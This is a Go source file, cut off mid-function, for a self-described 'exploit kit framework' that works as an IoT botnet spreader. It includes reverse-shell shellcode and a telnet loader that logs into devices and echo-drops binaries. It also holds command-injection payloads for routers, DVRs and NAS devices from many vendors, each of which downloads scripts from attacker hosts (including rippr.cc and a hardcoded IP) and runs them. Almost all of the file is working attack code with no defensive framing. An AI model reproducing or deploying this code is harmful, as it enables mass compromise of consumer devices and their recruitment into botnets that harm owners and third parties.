1
package main
2

3
import (
4
    "net"
5
    "time"
6
    "bufio"
7
    "fmt"
8
    "os"
9
    "sync"
10
    "strings"
11
    "strconv"
12
    "io/ioutil"
13
    "math/rand"
14
    "encoding/binary"
15
    "encoding/base64"
16
)
17

18
/*
19

20
Exploit kit framework 1.0.0.
21

22
Contains:
23
Reverse shell loader (DONE)
24
Telnet loader (arch detect, dir detect, echo load) (DONE)
25

26
Exploits:
27
UCHTTPD (DONE)
28
TVT-4567 (DONE)
29
TVT-WEB (DONE)
30
UNIX CCTV (DONE)
31
FIBERHOME ROUTER (DONE)
32
VIGOR ROUTER (DONE)
33
COMTREND ROUTER (DONE)
34
GPONFIBER ROUTER (DONE)
35
BROADCOM ROUTER (DONE)
36
DVRIP (DONE)
37
LIBDVR (DONE)
38
HONGDIAN ROUTER (DONE)
39
REALTEK MULTI ROUTER (DONE)
40
TENDA ROUTER (DONE)
41
TOTOLINK ROUTER (DONE)
42
ALCATEL NAS (DONE)
43
LILINDVR (DONE)
44
LINKSYS ESERIES (DONE)
45
*/
46

47
const (
48
	EI_NIDENT int = 16
49
	EI_DATA int = 5
50
	EE_LITTLE int = 1
51
	EE_BIG int = 2
52

53
	EM_ARM int = 40
54
	EM_MIPS int = 8
55
	EM_AARCH64 int = 183
56
	EM_PPC int = 20
57
	EM_PPC64 int = 21
58
	EM_SH int = 42
59

60
	DVRIP_NORESP int = 0
61
	DVRIP_OK int = 100
62
	DVRIP_FAILED int = 203
63
	DVRIP_UPGRADED int = 515
64

65
    echoLineLen = 128
66
    echoDlrOutFile = "qn_local"
67

68
    loaderTvtWebTag = "selfrep.tvt"
69
    loaderTvt4567Tag = "selfrep.tvt"
70
    loaderVigorTag = "selfrep.vigor"
71
    loaderComtrendTag = "selfrep.comtrend"
72
    loaderGponfiberTag = "selfrep.gponfiber"
73
    loaderFiberhomeTag = "selfrep.fiberhome"
74
    loaderLibdvrTag = "selfrep.libdvr"
75
    loaderDvripTag = "selfrep.dvrip"
76
    loaderUchttpdTag = "selfrep.uchttpd"
77
    loaderHongdianTag = "selfrep.hongdian"
78
    loaderTendaTag = "selfrep.tenda"
79
    loaderTotolinkTag = "selfrep.totolink"
80
    loaderZyxelTag = "selfrep.zyxel"
81
    loaderAlcatleTag = "selfrep.alcatel"
82
    loaderLilinTag = "selfrep.lilin"
83
	loaderLinksysTag = "selfrep.linksys"
84
	loaderZteTag = "selfrep.zte"
85
	loaderNetgearTag = "selfrep.netgear"
86
	loaderDlinkTag = "selfrep.dlink"
87

88
    loaderDownloadServer = "1.1.1.1" // Remote IP Of Server With Bins And Sh Files
89
    loaderBinsLocation = "/a/b/" // Path To Bins
90
    loaderScriptsLocation = "/a/" // Path To Bins
91
)
92

93
type elfHeader struct {
94
	e_ident[EI_NIDENT] int8
95
    e_type, e_machine int16
96
    e_version int32
97
}
98

99
type smapsRegion struct {
100
    region uint64
101
    size, pss, rss int
102
    shared_clean, shared_ditry int
103
    private_clean, private_dirty int
104
}
105

106
type echoDropper struct {
107
    payload [128]string
108
    payload_count int
109
}
110

111
var (
112
    netTimeout time.Duration = 30
113
    workerGroup sync.WaitGroup
114
    magicGroup sync.WaitGroup
115
    mode, doExploit string
116
    exploitMap map[string]interface{}
117
    dropperMap map[string]echoDropper
118
)
119

120
// counters
121
var telShells, payloadSent int
122

123
var (
124
	// uc exploit settings
125
    // should be reverse shell to same ip as loader on port 31391
126
    uchttpdShellCode string = "\x01\x10\x8f\xe2\x11\xff\x2f\xe1\x11\xa1\x8a\x78\x01\x3a\x8a\x70\x02\x21\x08\x1c\x01\x21\x92\x1a\x0f\x02\x19\x37\x01\xdf\x06\x1c\x0b\xa1\x02\x23\x0b\x80\x10\x22\x02\x37\x01\xdf\x3e\x27\x01\x37\xc8\x21\x30\x1c\x01\xdf\x01\x39\xfb\xd5\x07\xa0\x92\x1a\xc2\x71\x05\xb4\x69\x46\x0b\x27\x01\xdf\x01\x21\x08\x1c\x01\xdf\xc0\x46\xff\xff\x7b\xb4\xb9\x35\x5a\x13\x2f\x62\x69\x6e\x2f\x73\x68\x58\xff\xff\xc0\x46\xef\xbe\xad\xde"
127
    ucRshellPort int = 31412
128

129
    // tvt exploit settings
130
    tvtWebPayload string = "cd${IFS}/tmp;wget${IFS}http://" + loaderDownloadServer + loaderScriptsLocation + "wget.sh${IFS}-O-${IFS}>sfs;chmod${IFS}777${IFS}sfs;sh${IFS}sfs${IFS}" + loaderTvtWebTag
131
    tvt4567Payload string = "cd${IFS}/tmp;wget${IFS}http://" + loaderDownloadServer + loaderScriptsLocation + "wget.sh${IFS}-O-${IFS}>sfs;chmod${IFS}777${IFS}sfs;sh${IFS}sfs${IFS}" + loaderTvt4567Tag
132

133
	// magic exploit settings
134
    magicPacketIds []string = []string{"\x62", "\x69", "\x6c", "\x52", "\x44", "\x67", "\x43", "\x4d"}
135
    magicPorts []int = []int{1000, 2000, 3000, 4000, 5000, 6000, 7000, 8000, 8001, 8002, 8003, 8004, 8005, 8006, 8007, 8008, 8009, 8010, 8020, 8030, 8040, 8050, 8060, 8070, 8080, 8090, 8100, 8200, 8300, 8400, 8500, 8600, 8700, 8800, 8888, 8900, 8999, 9000, 9090}
136
    magicPayload string = "wget http://rippr.cc/u -O-|sh;"
137
	
138
    // lilindvr payload
139
	lilinPayload string = "wget -O- http://" + loaderDownloadServer + "/l|sh"
140

141
	// fiberhome exploit settings
142
    fiberRandPort int = 1 // 0 for use below
143
    fiberStaticPort int = 31784
144
    fiberSecStrs []string = []string{"0.3123525368318707", "0.13378587435314315", "0.8071510413685209"}
145

146
	// vigor exploit settings
147
    vigorPayload string = "bin%2Fsh%24%7BIFS%7D-c%24%7BIFS%7D%27cd%24%7BIFS%7D%2Ftmp%24%7BIFS%7D%26%26%24%7BIFS%7Dbusybox%24%7BIFS%7Dwget%24%7BIFS%7Dhttp%3A%2F%2F" + loaderDownloadServer + loaderBinsLocation + "bot.arm7%24%7BIFS%7D%26%26%24%7BIFS%7Dchmod%24%7BIFS%7D777%24%7BIFS%7Dbot.arm7%24%7BIFS%7D%26%26%24%7BIFS%7D.%2Fbot.arm7%24%7BIFS%7D" + loaderVigorTag + "%24%7BIFS%7D%26%26%24%7BIFS%7Drm%24%7BIFS%7D-rf%24%7BIFS%7Dbot.arm7"
148

149
	// broadcom router settings
150
	broadcomPayload string = "$(wget%20http://" + loaderDownloadServer + "/b%20-O-|sh)"
151

152
	// hongdian router settings
153
	hongdianPayload string = "cd+/tmp%3Bbusybox+wget+http://" + loaderDownloadServer + loaderScriptsLocation + "wget.sh+-O-+>sfs;chmod+777+sfs%3Bsh+sfs+" + loaderHongdianTag + "%3Brm+-rf+sfs"
154

155
	// tenda router settings
156
	tendaPayload string = "cd%20/tmp%3Brm%20wget.sh%3Bwget%20http%3A//" + loaderDownloadServer + loaderScriptsLocation + "wget.sh%3Bchmod%20777%20wget.sh%3Bsh%20wget.sh%20" + loaderTendaTag
157

158
	// totlink router settings
159
	totolinkPayload string = "wget%20http%3A%2F%2F" + loaderDownloadServer + "%2Fa%2Fwget.sh%20-O%20-%20%3Esplash.sh%3B%20chmod%20777%20splash.sh%3B%20sh%20splash.sh%20" + loaderTotolinkTag
160

161
	// zyxel nas settings
162
	zyxelPayload string = "cd%20/tmp;wget%20http://" + loaderDownloadServer + loaderScriptsLocation + "wget.sh%20-O-%20>s;chmod%20777%20s;sh%20s%20" + loaderZyxelTag + ";"
163
	zyxelPayloadTwo string = "cd+%2Ftmp%3Bwget+http%3A%2F%2F" + loaderDownloadServer + "%2Fa%2Fwget.sh%3Bchmod+777+wget.sh%3Bsh+wget.sh+" + loaderZyxelTag + "%3Brm+-rf+wget.sh"
164

165
	// alcatel nas settings
166
	alcatelPayload string = "cd${IFS}/tmp;wget${IFS}http://" + loaderDownloadServer + loaderScriptsLocation + "wget.sh${IFS}-O-${IFS}>sfs;chmod${IFS}777${IFS}sfs;sh${IFS}sfs${IFS}" + loaderAlcatleTag
167

168
	// linksys router settings
169
	linksysPayload string = "cd+%2Ftmp%3Bwget+http%3A%2F%2F" + loaderDownloadServer + "%2Fa%2Fwget.sh%3Bsh+wget.sh+" + loaderLinksysTag + "%3Brm+-rf+wget.sh"
170
	linksysTwoPayload string = "cd+%2Ftmp%3Bwget+http%3A%2F%2F" + loaderDownloadServer + "%2Fa%2Fwget.sh%3Bchmod+777+wget.sh%3Bsh+wget.sh+" + loaderLinksysTag + "%3Brm+-rf+wget.sh"
171

172
	// zte router settings
173
	ztePayload string = "cd+%2Ftmp%3Bwget+http%3A%2F%2F" + loaderDownloadServer + "%2Fa%2Fwget.sh%3Bchmod+777+wget.sh%3Bsh+wget.sh+" + loaderZyxelTag + "%3Brm+-rf+wget.sh"
174

175
	// netgear router settings
176
	netgearPayload string = "cd+%2Ftmp%3Bwget+http%3A%2F%2F" + loaderDownloadServer + "%2Fa%2Fwget.sh%3Bchmod+777+wget.sh%3Bsh+wget.sh+" + loaderNetgearTag + "%3Brm+-rf+wget.sh"
177

178
	// gpon router settings
179
	gponOGPayload string = "wget+http%3A%2F%2F" + loaderDownloadServer + "%2Fg+-O-%7Csh%60%3Bwget+http%3A%2F%2F37.0.11.220%2Fg+-O-%7Csh"
180

181
	// dlink router settings
182
	dlinkTwoPayload string = "cd+%2Ftmp%3Bwget+http%3A%2F%2F" + loaderDownloadServer + "%2Fa%2Fwget.sh%3Bchmod+777+wget.sh%3Bsh+wget.sh+" + loaderDlinkTag + "%3Brm+-rf+wget.sh"
183
	dlinkThreePayload string = "cd /tmp;wget http://" + loaderDownloadServer + "/a/wget.sh;chmod 777 wget.sh;sh wget.sh " + loaderDlinkTag + ";rm -rf wget.sh"
184
)
185

186
func zeroByte(a []byte) {
187

188
    for i := range a {
189
        a[i] = 0
190
    }
191
}
192

193
func getStringInBetween(str string, start string, end string) (result string) {
194

195
    s := strings.Index(str, start)
196
    if s == -1 {
197
        return
198
    }
199

200
    s += len(start)
201
    e := strings.Index(str, end)
202

203
    if (s > 0 && e > s + 1) {
204
        return str[s:e]
205
    } else {
206
        return "null"
207
    }
208
}
209

210
func randStr(strlen int) (string) {
211

212
	var b strings.Builder
213

214
    rand.Seed(time.Now().UnixNano())
215
    chars := []rune("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz")
216

217
    for i := 0; i < strlen; i++ {
218
        b.WriteRune(chars[rand.Intn(len(chars))])
219
    }
220

221
    return b.String()
222
}
223

224
func hexToInt(hexStr string) (uint64) {
225
    cleaned := strings.Replace(hexStr, "0x", "", -1)
226
    result, _ := strconv.ParseUint(cleaned, 16, 64)
227
    return uint64(result)
228
}
229

230
/*        TELNET LOADER MODULE         */
231

232
func telnetLoadDroppers() {
233

234
    files, err := ioutil.ReadDir("dlrs")
235
    if err != nil {
236
        fmt.Printf("\033[1;31mError: Failed to open dlrs/\r\n")
237
        os.Exit(0)
238
    }
239

240
    for i := 0; i < len(files); i++ {
241
        file, err := os.OpenFile("dlrs/" + files[i].Name(), os.O_RDONLY, 0755)
242
        if err != nil {
243
            continue
244
        }
245

246
        mapVal := echoDropper{}
247
        mapVal.payload_count = 0
248

249
        for {
250
            var echoString string
251
            dataBuf := make([]byte, echoLineLen)
252

253
            length, err := file.Read(dataBuf)
254
            if err != nil || length <= 0 {
255
                break
256
            }
257

258
            for i := 0; i < length; i++ {
259
                echoByte := fmt.Sprintf("\\x%02x", uint8(dataBuf[i]))
260
                echoString += echoByte
261
            }
262

263
            if mapVal.payload_count == 0 {
264
                mapVal.payload[mapVal.payload_count] = fmt.Sprintf("echo -ne \"%s\" > ", echoString)
265
            } else {
266
                mapVal.payload[mapVal.payload_count] = fmt.Sprintf("echo -ne \"%s\" >> ", echoString)
267
            }
268

269
            mapVal.payload_count++
270
        }
271

272
        dropperMap[files[i].Name()] = mapVal
273
        file.Close()
274
    }
275

276
    fmt.Printf("\x1b[38;5;46mLoader\x1b[38;5;15m: \x1b[38;5;15mLoaded \x1b[38;5;134m%d\x1b[38;5;15m echo droppers\x1b[38;5;15m\x1b[38;5;15m\r\n", len(dropperMap))
277
}
278

279
func telnetHasPrompt(buffer string) (bool) {
280

281
	if strings.Contains(buffer, "#") || strings.Contains(buffer, ">") || strings.Contains(buffer, "$") || strings.Contains(buffer, "%") || strings.Contains(buffer, "@") {
282
		return true
283
	} else {
284
		return false
285
	}
286
}
287

288
func telnetBusyboxShell(conn net.Conn) {
289

290
	/* Looks wierd but dw its for some BCM router */
291
	conn.Write([]byte("sh\r\n"))
292
	conn.Write([]byte("..\r\n"))
293
	conn.Write([]byte("linuxshell\r\n"))
294
	/* ------------------------------------------ */
295

296
	conn.Write([]byte("enable\r\n"))
297
	conn.Write([]byte("development\r\n"))
298
	conn.Write([]byte("system\r\n"))
299
	conn.Write([]byte("sh\r\n"))
300
	conn.Write([]byte("shell\r\n"))
301
	conn.Write([]byte("ping ; sh\r\n"))
302
}
303

304
func telnetDropDropper(conn net.Conn, myarch string) (bool) {
305

306
    for arch, mapval := range dropperMap {
307
        splitVal := strings.Split(arch, ".")
308
        if len(splitVal) != 2 {
309
            continue
310
        }
311

312
        if splitVal[1] == myarch {
313
            query := randStr(5)
314
            dropper := randStr(5)
315
            droppedLines := 0
316

317
            for i := 0; i < mapval.payload_count; i++ {
318
                var rdbuf []byte = []byte("")
319
                complete := 0
320

321
                conn.Write([]byte(mapval.payload[i] + dropper + "; /bin/busybox " + query + "\r\n"))
322

323
                for {
324
                    tmpbuf := make([]byte, 128)
325
                    ln, err := conn.Read(tmpbuf)
326
                    if ln <= 0 || err != nil {
327
                        break
328
                    }
329

330
                    rdbuf = append(rdbuf, tmpbuf...)
331
                    if strings.Contains(string(rdbuf), ": applet not found") {
332
                        complete = 1
333
                        break
334
                    }
335
                }
336

337
                if complete == 0 {
338
                    return false
339
                }
340

341
                droppedLines++
342
            }
343

344
            if droppedLines == mapval.payload_count {
345
                var rdbuf []byte = []byte("")
346

347
                conn.Write([]byte("chmod 777 " + dropper + "; ./" + dropper + "; rm -rf " + dropper + "; /bin/busybox " + query + "\r\n"))
348

349
                for {
350
                    tmpbuf := make([]byte, 128)
351
                    ln, err := conn.Read(tmpbuf)
352
                    if ln <= 0 || err != nil {
353
                        break
354
                    }
355

356
                    rdbuf = append(rdbuf, tmpbuf...)
357
                    if strings.Contains(string(rdbuf), ": applet not found") {
358
                        return true
359
                    }
360
                }
361

362
                return false
363
            } else {
364
                return false
365
            }
366
        } else {
367
            continue
368
        }
369
    }
370

371
    return false
372
}
373

374
func telnetHasBusybox(conn net.Conn) (bool, string) {
375

376
	var rdbuf []byte = []byte("")
377

378
	query := randStr(6)
379
	resp := ": applet not found"
380

381
	conn.Write([]byte("/bin/busybox " + query + "\r\n"))
382
	for {
383
	    tmpbuf := make([]byte, 128)
384
		ln, err := conn.Read(tmpbuf)
385
		if ln <= 0 || err != nil {
386
		    break
387
		}
388

389
		rdbuf = append(rdbuf, tmpbuf...)
390
		if strings.Contains(string(rdbuf), resp) == true {
391
			index := strings.Index(string(rdbuf), "BusyBox v")
392
			if index == -1 {
393
				return true, "unknown"
394
			} else {
395
				verstr := strings.Split(string(rdbuf)[len("BusyBox v")+index:], " ")
396
				if len(verstr) > 0 {
397
					return true, verstr[0]
398
				} else {
399
					return true, "unknown"
400
				}
401
				
402
			}
403
		}
404
	}
405

406
	return false, "unknown"
407
}
408

409
func telnetWritableDir(conn net.Conn) (bool, string) {
410

411
	var rdbuf []byte
412
	dirs := []string{"/tmp/", "/var/tmp/", "/var/", "/mnt/", "/etc/", "/", "/dev/"}
413

414
	for i := 0; i < len(dirs); i++ {
415
		echoStr := randStr(4)
416
		conn.Write([]byte("cd " + dirs[i] + " && echo " + echoStr + "\r\n"))
417

418
		for {
419
		    tmpbuf := make([]byte, 128)
420
			ln, err := conn.Read(tmpbuf)
421
			if ln <= 0 || err != nil {
422
			    break
423
			}
424

425
			rdbuf = append(rdbuf, tmpbuf...)
426
			if strings.Contains(string(rdbuf), "can't cd") || strings.Contains(string(rdbuf), "No such file or") {
427
				break
428
			} else if strings.Contains(string(rdbuf), echoStr) {
429
				return true, dirs[i]
430
			}
431
		}
432

433
		zeroByte(rdbuf)
434
	}
435

436
	return false, "none"
437
}
438

439
func telnetExtractArch(conn net.Conn) (bool, string) {
440

441
	var rdbuf []byte
442
	var index int = -1
443

444
	conn.Write([]byte("/bin/busybox cat /bin/echo\r\n"))
445

446
	for {
447
		tmpbuf := make([]byte, 128)
448
		ln, err := conn.Read(tmpbuf)
449
		if ln <= 0 || err != nil {
450
			break
451
		}
452

453
		rdbuf = append(rdbuf, tmpbuf...)
454
		index = strings.Index(string(rdbuf), "ELF")
455

456
		if index != -1 {
457
			zeroByte(tmpbuf)
458
			ln, err := conn.Read(tmpbuf)
459

460
			if ln <= 0 || err != nil {
461
				break
462
			}
463

464
			rdbuf = append(rdbuf, tmpbuf...)
465
			break
466
		}
467
	}
468

469
	if index == -1 {
470
		return false, "none"
471
	}
472

473
	rdbuf = rdbuf[index:]
474
	elfHdr := elfHeader{}
475

476
	for i := 0; i < EI_NIDENT; i++ {
477
		elfHdr.e_ident[i] = int8(rdbuf[i])
478
	}
479

480
	elfHdr.e_type = int16(rdbuf[EI_NIDENT])
481
	elfHdr.e_machine = int16(rdbuf[EI_NIDENT + 2])
482
	elfHdr.e_version = int32(rdbuf[EI_NIDENT + 2 + 2])
483

484
	if elfHdr.e_machine == int16(EM_ARM) {
485
		return true, "arm"
486
	} else if elfHdr.e_machine == int16(EM_MIPS) {
487
		if elfHdr.e_ident[EI_DATA] == int8(EE_LITTLE) {
488
			return true, "mpsl"
489
		} else {
490
			return true, "mips"
491
		}
492
	} else if elfHdr.e_machine == int16(EM_PPC) || elfHdr.e_machine == int16(EM_PPC64) {
493
		return true, "ppc"
494
	} else if elfHdr.e_machine == int16(EM_SH) {
495
		return true, "sh4"
496
	}
497

498
	return false, ""
499
}
500

501
func telnetLoader(target string, dologin int, arch string, tag string) {
502

503
	var (
504
		rdbuf []byte = []byte("")
505
		loggedIn int = 0
506
	)
507

508
	conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
509
    if err != nil {
510
        return    
511
    }
512

513
    if dologin == 0 {
514
	    for {
515
	    	tmpbuf := make([]byte, 128)
516
		    ln, err := conn.Read(tmpbuf)
517
		    if ln <= 0 || err != nil {
518
		    	break
519
		    }
520

521
		    rdbuf = append(rdbuf, tmpbuf...)
522
		    if telnetHasPrompt(string(rdbuf)) == true {
523
		    	loggedIn = 1
524
		    	break
525
		    }
526
	    }
527
	}
528

529
    zeroByte(rdbuf)
530
	if loggedIn == 0 {
531
		conn.Close()
532
		return
533
	}
534

535
	fmt.Printf("\x1b[38;5;46mTelnet\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m shell found on device\x1b[38;5;15m\x1b[38;5;15m\r\n", target)
536
	telnetBusyboxShell(conn)
537

538
	has, ver := telnetHasBusybox(conn)
539
	if has == false {
540
		conn.Close()
541
		return
542
	}
543

544
	fmt.Printf("\x1b[38;5;46mTelnet\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m device is running busybox version \x1b[38;5;134m%s\x1b[38;5;15m\r\n", target, ver)
545
    telShells++
546

547
	has, dir := telnetWritableDir(conn)
548
	if has == false {
549
		conn.Close()
550
		return
551
	}
552

553
	fmt.Printf("\x1b[38;5;46mTelnet\x1b[38;5;15m: \x1b[38;5;134m%s:v%s\x1b[38;5;15m found writable directory \x1b[38;5;134m%s\x1b[38;5;15m\r\n", target, ver, dir)
554

555
    has, _ = telnetHasBusybox(conn)
556
    if has == false {
557
        conn.Close()
558
        return
559
    }
560

561
	fmt.Printf("\x1b[38;5;46mTelnet\x1b[38;5;15m: \x1b[38;5;134m%s:v%s:%s\x1b[38;5;15m extracted arch \x1b[38;5;134m%s\x1b[38;5;15m\r\n", target, ver, dir, arch)
562
    
563
    dropped := telnetDropDropper(conn, arch)
564
    if dropped == false {
565
        conn.Close()
566
        return
567
    }
568

569
    fmt.Printf("\x1b[38;5;46mTelnet\x1b[38;5;15m: \x1b[38;5;134m%s:v%s:%s:%s\x1b[38;5;15m finnished echo loading\x1b[38;5;15m\r\n", target, ver, dir, arch)
570
    
571
    binName := randStr(6)
572
    conn.Write([]byte("/bin/busybox cat " + echoDlrOutFile + " > " + binName + "; chmod 777 " + binName + "; ./" + binName + " " + tag + "\r\n"))
573
    // Done?
574
    time.Sleep(5 * time.Second)  
575
    conn.Close()
576
    return   
577
}
578

579
/* ------ END OF TELNET LOADER ------- */
580

581
/* ------ OTHER PROTOCOL STUFF ------- */
582

583
func reverseShellUchttpdLoader(conn net.Conn) {
584

585
	var (
586
		rdbuf []byte = []byte("")
587
		query string = randStr(5)
588
	)
589

590
	conn.Write([]byte(">/tmp/.h && cd /tmp/\r\n"))
591
	conn.Write([]byte(">/mnt/.h && cd /mnt/\r\n"))
592
	conn.Write([]byte(">/var/.h && cd /var/\r\n"))
593
	conn.Write([]byte(">/dev/.h && cd /dev/\r\n"))
594
	conn.Write([]byte(">/var/tmp/.h && cd /var/tmp/\r\n"))
595
	conn.Write([]byte("/bin/busybox " + query + "\r\n"))
596

597
	for {
598
		tmpbuf := make([]byte, 128)
599
		ln, err := conn.Read(tmpbuf)
600
		if ln <= 0 || err != nil {
601
			conn.Close()
602
			return
603
		}
604

605
		rdbuf = append(rdbuf, tmpbuf...)
606
		if strings.Contains(string(rdbuf), ": applet not found") {
607
			break
608
		}
609
	}
610

611
	zeroByte(rdbuf)
612
	
613
    dropped := telnetDropDropper(conn, "arm7")
614
    if dropped == false {
615
        conn.Close()
616
        return
617
    }
618

619
    fmt.Printf("\x1b[38;5;46mUchttpd\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m payload sent to device\x1b[38;5;15m\r\n", conn.RemoteAddr())
620
    payloadSent++
621
    binName := randStr(6)
622
    conn.Write([]byte("/bin/busybox cat " + echoDlrOutFile + " > " + binName + "; chmod 777 " + binName + "; ./" + binName + " " + loaderUchttpdTag + ";\r\n"))
623
	conn.Write([]byte("/var/Sofia 2>/dev/null &\r\n"))
624
	return
625
}
626

627
func infectFunctionTvt4567(conn net.Conn) {
628

629
    var (
630
        rdbuf []byte = []byte("")
631
        state = 0
632
    )
633

634
    payload := "\x0c\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x21\x00\x02\x00\x01\x00\x04\x00\x50\x02\x00\x00\x50\x02\x00\x00\x00\x00\x00\x00\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x75\x74\x66\x2d\x38\x22\x3f\x3e\x3c\x72\x65\x71\x75\x65\x73\x74\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20\x73\x79\x73\x74\x65\x6d\x54\x79\x70\x65\x3d\x22\x4e\x56\x4d\x53\x2d\x39\x30\x30\x30\x22\x20\x63\x6c\x69\x65\x6e\x74\x54\x79\x70\x65\x3d\x22\x57\x45\x42\x22\x3e\x3c\x74\x79\x70\x65\x73\x3e\x3c\x66\x69\x6c\x74\x65\x72\x54\x79\x70\x65\x4d\x6f\x64\x65\x3e\x3c\x65\x6e\x75\x6d\x3e\x72\x65\x66\x75\x73\x65\x3c\x2f\x65\x6e\x75\x6d\x3e\x3c\x65\x6e\x75\x6d\x3e\x61\x6c\x6c\x6f\x77\x3c\x2f\x65\x6e\x75\x6d\x3e\x3c\x2f\x66\x69\x6c\x74\x65\x72\x54\x79\x70\x65\x4d\x6f\x64\x65\x3e\x3c\x61\x64\x64\x72\x65\x73\x73\x54\x79\x70\x65\x3e\x3c\x65\x6e\x75\x6d\x3e\x69\x70\x3c\x2f\x65\x6e\x75\x6d\x3e\x3c\x65\x6e\x75\x6d\x3e\x69\x70\x72\x61\x6e\x67\x65\x3c\x2f\x65\x6e\x75\x6d\x3e\x3c\x65\x6e\x75\x6d\x3e\x6d\x61\x63\x3c\x2f\x65\x6e\x75\x6d\x3e\x3c\x2f\x61\x64\x64\x72\x65\x73\x73\x54\x79\x70\x65\x3e\x3c\x2f\x74\x79\x70\x65\x73\x3e\x3c\x63\x6f\x6e\x74\x65\x6e\x74\x3e\x3c\x73\x77\x69\x74\x63\x68\x3e\x74\x72\x75\x65\x3c\x2f\x73\x77\x69\x74\x63\x68\x3e\x3c\x66\x69\x6c\x74\x65\x72\x54\x79\x70\x65\x20\x74\x79\x70\x65\x3d\x22\x66\x69\x6c\x74\x65\x72\x54\x79\x70\x65\x4d\x6f\x64\x65\x22\x3e\x72\x65\x66\x75\x73\x65\x3c\x2f\x66\x69\x6c\x74\x65\x72\x54\x79\x70\x65\x3e\x3c\x66\x69\x6c\x74\x65\x72\x4c\x69\x73\x74\x20\x74\x79\x70\x65\x3d\x22\x6c\x69\x73\x74\x22\x3e\x3c\x69\x74\x65\x6d\x54\x79\x70\x65\x3e\x3c\x61\x64\x64\x72\x65\x73\x73\x54\x79\x70\x65\x20\x74\x79\x70\x65\x3d\x22\x61\x64\x64\x72\x65\x73\x73\x54\x79\x70\x65\x22\x2f\x3e\x3c\x2f\x69\x74\x65\x6d\x54\x79\x70\x65\x3e\x3c\x69\x74\x65\x6d\x3e\x3c\x73\x77\x69\x74\x63\x68\x3e\x74\x72\x75\x65\x3c\x2f\x73\x77\x69\x74\x63\x68\x3e\x3c\x61\x64\x64\x72\x65\x73\x73\x54\x79\x70\x65\x3e\x69\x70\x3c\x2f\x61\x64\x64\x72\x65\x73\x73\x54\x79\x70\x65\x3e\x3c\x69\x70\x3e\x24\x28"
635
    payload += tvt4567Payload
636
    payload += "\x3c\x2f\x69\x70\x3e\x3c\x2f\x69\x74\x65\x6d\x3e\x3c\x2f\x66\x69\x6c\x74\x65\x72\x4c\x69\x73\x74\x3e\x3c\x2f\x63\x6f\x6e\x74\x65\x6e\x74\x3e\x3c\x2f\x72\x65\x71\x75\x65\x73\x74\x3e\x00"
637
    payload = base64.StdEncoding.EncodeToString([]byte(payload))
638

639
    cntlen := strconv.Itoa(len(payload))
640

641
    conn.Write([]byte("{D79E94C5-70F0-46BD-965B-E17497CCB598}"))
642

643
    for {
644
        tmpbuf := make([]byte, 128)
645
        ln, err := conn.Read(tmpbuf)
646
        if ln <= 0 || err != nil {
647
            break
648
        }
649

650
        rdbuf = append(rdbuf, tmpbuf...)
651
        if strings.Contains(string(rdbuf), "{D79E94C5-70F0-46BD-965B-E17497CCB598}") && state != 1 {
652
            conn.Write([]byte("GET /saveSystemConfig HTTP/1.1\r\nAuthorization: Basic\r\nContent-type: text/xml\r\nContent-Length: " + cntlen + "\r\n{D79E94C5-70F0-46BD-965B-E17497CCB598} 2\r\n\r\n" + payload + "\r\n\r\n"))
653
            zeroByte(rdbuf)
654
            state = 1
655
            continue
656
        } else if strings.Contains(string(rdbuf), "200") && state == 1 {
657
            fmt.Printf("\x1b[38;5;46mTvt-4567\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m payload sent to device\x1b[38;5;15m\r\n", conn.RemoteAddr().String())
658
            conn.Close()
659
            payloadSent++
660
            return
661
        }
662
    }
663

664
    conn.Close()
665
}
666

667
func infectFunctionMagicProto(target string) {
668

669
    var (
670
        rdbuf []byte = []byte("")
671
        state = 0
672
    )
673

674
    conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
675
    if err != nil {
676
        magicGroup.Done()
677
        return
678
    }
679

680
    payloadOne := "\x5a\xa5\x06\x15\x00\x00\x00\x98\x00\x00\x00"
681
    payloadTwo := "\x00\x00\x00\x00\x00\x00\x00\x00\x47\x4d\x54\x2b\x30\x39\x3a\x30\x30\x20\x53\x65\x6f\x75\x6c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x74\x69\x6d\x65\x2e\x6e\x69\x73\x74\x2e\x67\x6f\x76\x26"
682
    payloadThree := "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00"
683

684
    conn.Write([]byte("\x5a\xa5\x01\x20\x00\x00\x00\x00"))
685

686
    for {
687
        tmpbuf := make([]byte, 128)
688
        ln, err := conn.Read(tmpbuf)
689
        if ln <= 0 || err != nil {
690
            break
691
        }
692

693
        rdbuf = append(rdbuf, tmpbuf...)
694
        if state == 0 && len(rdbuf) >= 4 && string(rdbuf[:4]) == "\x5a\xa5\x01\x20" {
695
            conn.Close()
696

697
            conn, err = net.DialTimeout("tcp", target, 10 * time.Second)
698
            if err != nil {
699
                magicGroup.Done()
700
                return 
701
            }
702

703
            payload := payloadOne
704
            payload += magicPacketIds[state]
705
            payload += payloadTwo
706
            payload += magicPayload + "f"
707
            payload += payloadThree
708

709
            conn.Write([]byte(payload))
710
            state++
711
            zeroByte(rdbuf)
712
            continue
713
        } else if state >= 1 {
714
            conn.Close()
715

716
            if state == 8 {
717
                fmt.Printf("\x1b[38;5;46mMagic\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m potential payload sent to device\x1b[38;5;15m\r\n", target)
718
                payloadSent++
719
                magicGroup.Done()
720
                return
721
            }
722
            conn, err = net.DialTimeout("tcp", target, 10 * time.Second)
723
            if err != nil {
724
                magicGroup.Done()
725
                return 
726
            }
727

728
            payload := payloadOne
729
            payload += magicPacketIds[state]
730
            payload += payloadTwo
731
